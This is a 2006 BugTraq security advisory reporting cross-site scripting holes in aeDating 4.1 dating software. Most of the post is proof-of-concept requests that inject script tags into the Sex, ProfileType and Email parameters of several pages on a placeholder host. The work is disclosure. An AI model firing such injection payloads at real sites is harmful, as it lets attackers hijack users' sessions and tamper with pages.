BugTraq
aeDating 4.1 XSS Jun 22 2006 05:23PM
securityconnection gmail com
Product of AEwebworks Dating Software

http://www.aewebworks.com/

---------------------------

Cross Site Scripting (XSS)

---------------------------

http://target.xx:80/index.php?Sex="><script>alert(/Elipsis+Security+Test
/)</script>&Mode=last

^"G4" Template work^

---

POST /join_form.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: target.xx

Content-Length: 1685

page=1&ID=1&ProfileType="><script>alert(/Elipsis+Security+Test/)</script
>&NickName=1&RealName=1&Sex=female&Country=0&City=1&zip=1&Children=0&Whe
reChildren=

---

POST /forgot.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: target.xx

Content-Length: 65

Email="><script>alert(/Elipsis+Security+Test/)</script>

-----------------

Ellipsis Security

http://www.ellsec.org

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus